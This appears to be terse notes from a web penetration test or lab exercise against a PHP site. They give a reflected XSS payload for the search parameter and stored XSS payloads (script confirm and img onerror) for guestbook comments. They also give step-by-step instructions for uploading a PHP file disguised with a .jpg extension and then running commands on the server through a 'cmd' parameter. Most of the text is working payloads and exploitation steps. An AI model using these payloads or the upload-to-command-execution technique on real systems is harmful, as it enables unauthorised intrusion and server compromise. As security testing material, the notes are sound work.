Right off the bat, try hitting the search box with a simple XSS payload:
search.php?query=<script>alert(1)<%2Fscript>&x=24&y=12
#/guestbook.php
Placing this:
<script>confirm(1)</script>
<img src=x onerror='confirm(2)' />
into a comment body yields stored XSS
Next I made an account and started uploading stuff, turns out php files are uploadable and executable:
- Make the file's name be: whatever.php
- Make its extension: .jpg
- Upload
- Open the broken image on the page you're redirected to and open its URL in a new tab, remove the 550 from the URL
- ?cmd=ls -latr